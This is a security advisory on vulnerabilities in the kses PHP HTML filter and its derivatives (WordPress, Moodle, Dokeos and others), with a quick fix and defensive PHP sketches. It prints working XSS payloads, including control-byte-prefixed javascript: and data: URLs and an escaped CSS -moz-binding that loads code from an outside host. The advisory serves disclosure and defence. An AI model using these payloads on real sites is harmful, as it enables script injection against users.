Vulnerabilities in kses-based HTML filters
==========================================

During an internal code review performed by Allegro.pl, several
weaknesses were discovered in kses, a PHP HTML/XHTML filter. HTML
filters that use or are based on kses are part of many popular projects,
including WordPress, Moodle, Drupal, eGroupWare, Dokeos, PHP-Nuke,
Geeklog and others. The issues found range from cross-site scripting to
code execution, depending on the implementation.

Kses filters HTML by whitelisting allowed tags, attributes, and
protocols in attribute values. Additionally, it normalizes HTML entities
and performs a few blacklist checks. This approach makes it much more
reliable as a defence against XSS than a typical blacklist filter. Kses
has not been maintained since 2005, and multiple projects that use it
have developed their own versions. In most cases, these implementations
share the same vulnerabilities.


Quote from kses code:
function kses_bad_protocol_once($string, $allowed_protocols)
###############################################################################
# This function searches for URL protocols at the beginning of $string, while
# handling whitespace and HTML entities.
###############################################################################
{
  return preg_replace('/^((&[^;]*;|[\sA-Za-z0-9])*)'.
                      '(:|&#58;|&#[Xx]3[Aa];)\s*/e',
                      'kses_bad_protocol_once2("\\1", $allowed_protocols)',
                      $string);
} # function kses_bad_protocol_once


1. PHP code execution
This vulnerability is caused by an unsafe preg_replace() call that uses
the "e" modifier with a backreference placed between double quotes. It
is exploitable if the kses attribute-cleaning functions are called
without prior entity normalization. This is not the standard way of
using kses, but such implementations exist in widely deployed software.
Example:
--- stripped ---
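
The root of the problem is that the "e" modifier makes PHP evaluate the
replacement as code after the backreference has been substituted into
it. As a minimal sketch (not the kses code, and not the fix given in
this advisory), the same match can be done with preg_replace_callback(),
where the captured text only ever reaches the callback as string data.
The names sketch_check_protocol() and sketch_bad_protocol_once() are
hypothetical, and the protocol check is a simplified stand-in for
kses_bad_protocol_once2(). This addresses issue 1 only.

```php
<?php
// Hypothetical, simplified stand-in for kses_bad_protocol_once2():
// returns "proto:" if the name is whitelisted, otherwise an empty string.
// Assumes $allowed_protocols contains lowercase names.
function sketch_check_protocol($captured, $allowed_protocols)
{
    $name = strtolower(preg_replace('/\s/', '', $captured));
    return in_array($name, $allowed_protocols, true) ? $name . ':' : '';
}

// Same pattern as kses_bad_protocol_once(), but without the "e" modifier.
function sketch_bad_protocol_once($string, $allowed_protocols)
{
    return preg_replace_callback(
        '/^((&[^;]*;|[\sA-Za-z0-9])*)(:|&#58;|&#[Xx]3[Aa];)\s*/',
        function ($m) use ($allowed_protocols) {
            // $m[1] is plain data here; nothing is evaluated as PHP code.
            return sketch_check_protocol($m[1], $allowed_protocols);
        },
        $string
    );
}

$allowed = array('http', 'https', 'mailto');
echo sketch_bad_protocol_once('http://example.com/', $allowed), "\n";
echo sketch_bad_protocol_once('javascript:alert(1)', $allowed), "\n";
```

The first call leaves the URL unchanged; the second drops the
"javascript:" prefix. The "e" modifier itself was deprecated in PHP 5.5
and removed in PHP 7.0.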

2. Cross-site scripting - protocol check bypass
This vulnerability is caused by insufficient protocol checks in
attribute values. By injecting byte 0x08 (Firefox) or 0x0B (Opera) at
the beginning of an attribute value, it is possible to bypass the
kses_bad_protocol_once2() call.
Examples (partially URL-encoded for readability):
(Opera) <img src="%0Bjavascript:alert(document.domain)">
(Firefox) <a href='%08data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ%2B'>test</a>
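
The bypass can be seen by testing the pattern from
kses_bad_protocol_once() on its own. The sketch below drops the "e"
modifier and only checks whether the pattern matches, that is, whether
the protocol check would run at all. The helper name
sketch_protocol_check_runs() is hypothetical. Byte 0x08 is used because
whether \s matches 0x0B depends on the PCRE version in use.

```php
<?php
// Pattern from kses_bad_protocol_once(), without the "e" modifier.
$pattern = '/^((&[^;]*;|[\sA-Za-z0-9])*)(:|&#58;|&#[Xx]3[Aa];)\s*/';

// Hypothetical helper: true if the pattern matches, meaning the
// replacement (and so the protocol whitelist check) would be applied.
function sketch_protocol_check_runs($pattern, $value)
{
    return preg_match($pattern, $value) === 1;
}

$plain    = 'javascript:alert(document.domain)';
$prefixed = "\x08" . $plain;   // backspace byte before the protocol name

var_dump(sketch_protocol_check_runs($pattern, $plain));    // bool(true)
var_dump(sketch_protocol_check_runs($pattern, $prefixed)); // bool(false)
```

The pattern is anchored at the start of the string and the leading byte
is neither whitespace, alphanumeric, nor part of an entity, so the match
fails and the value is passed through unchecked.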

3. Cross-site scripting - allowed attributes
In some implementations, the style attribute is allowed. As kses is not
designed to deal with XSS inside CSS, such configurations are
vulnerable unless additional checks are added. In practice, code added
for cleaning CSS usually does not solve this problem sufficiently.
Example:
(Firefox) <a style=" ;\2d\6d\6f&#92;7a\2d\62\69\6e\64\69\6e\67: \75\72\6c(&#92;68\74\74\70\3a&#92;2F\2F\68\61\2E&#92;63\6B\65\72\73\2E\6F&#92;72\67\2F\78\73\73\6D\6F\7A\2E\78\6D\6C\23\78\73&#92;73)" href="http://example.com";>test</a>
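
To read the example, it helps to undo the two layers of encoding: HTML
entities (&#92; is a backslash) and CSS hexadecimal escapes. The sketch
below is a hypothetical helper for inspecting such values, not a CSS
sanitizer and not part of kses. It assumes escapes below 0x100 only.

```php
<?php
// Hypothetical helper for illustration; not part of kses.
// Handles only code points below 0x100, which is enough for this example.
function sketch_css_unescape($value)
{
    // First decode HTML entities, so that &#92; becomes a backslash.
    $value = html_entity_decode($value, ENT_QUOTES, 'UTF-8');

    // Then decode CSS escapes: a backslash, 1-6 hex digits, and an
    // optional single whitespace character that terminates the escape.
    return preg_replace_callback(
        '/\\\\([0-9a-fA-F]{1,6})\s?/',
        function ($m) {
            return chr(hexdec($m[1]));
        },
        $value
    );
}

// Property name taken from the example above.
$property = '\2d\6d\6f&#92;7a\2d\62\69\6e\64\69\6e\67';
echo sketch_css_unescape($property), "\n"; // -moz-binding
```

A filter that looks for dangerous property names in the raw attribute
value will not see "-moz-binding", while the browser decodes both layers
before applying the style.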


Solution
========

Sample quick fix for issue 1 and, assuming entities have already been
normalized, issue 2:
function kses_bad_protocol_once($string, $allowed_protocols)
###############################################################################
# This function searches for URL protocols at the beginning of $string, while
# handling whitespace and HTML entities.
###############################################################################
{
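  # Split at the first colon, whether literal or written as an entity.
  $string2 = preg_split('/:|&#58;|&#x3a;/i', $string, 2);
  # Check the first part as a protocol unless it contains "/?".
  if (isset($string2[1]) && !preg_match('%/\?%', $string2[0]))
  {
    $string = kses_bad_protocol_once2($string2[0], $allowed_protocols)
            . trim($string2[1]);
  }
  return $string;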
} # function kses_bad_protocol_once
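
As a rough illustration of how the quick fix behaves, the sketch below
runs it against a simplified stand-in for kses_bad_protocol_once2(). The
stand-in is an assumption made for this example: it only strips
whitespace and compares against a lowercase whitelist, and is not the
kses implementation.

```php
<?php
// Simplified stand-in for kses_bad_protocol_once2(); an assumption made
// for this sketch, not the kses implementation.
function kses_bad_protocol_once2($string, $allowed_protocols)
{
    $candidate = strtolower(preg_replace('/\s/', '', $string));
    return in_array($candidate, $allowed_protocols, true)
        ? $candidate . ':'
        : '';
}

// The quick fix from this advisory.
function kses_bad_protocol_once($string, $allowed_protocols)
{
    $string2 = preg_split('/:|&#58;|&#x3a;/i', $string, 2);
    if (isset($string2[1]) && !preg_match('%/\?%', $string2[0])) {
        $string = kses_bad_protocol_once2($string2[0], $allowed_protocols)
                . trim($string2[1]);
    }
    return $string;
}

$allowed = array('http', 'https', 'mailto');
echo kses_bad_protocol_once('http://example.com/', $allowed), "\n";
echo kses_bad_protocol_once("\x08javascript:alert(1)", $allowed), "\n";
```

With this stand-in, the first call prints the URL unchanged and the
second prints "alert(1)": everything before the first colon is now
checked against the whitelist, so the leading control byte no longer
lets the value skip the check.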

Another option is to replace the HTML filter with an actively supported
library. There are two such filters with a kses compatibility mode:
- HTML Purifier, http://htmlpurifier.org/
  (basic kses compatibility wrapper available at
  http://htmlpurifier.org/svnroot/htmlpurifier/trunk/library/HTMLPurifier.kses.php)
- htmLawed,
  http://www.bioinformatics.org/phplabware/internal_utilities/htmLawed/index.php

HTML Purifier has the advantage of proper CSS validation and secure
default settings, so it is the preferred solution.


Fixed software
==============
Dokeos 1.8.4 SP3, http://www.dokeos.com/download/dokeos-1.8.4-SP3.zip
eGroupWare 1.4.003, http://www.egroupware.org/download
WordPress 2.5, http://wordpress.org/download/
Moodle 1.9, http://download.moodle.org/


Regards,
Łukasz Pilorz, Allegro.pl


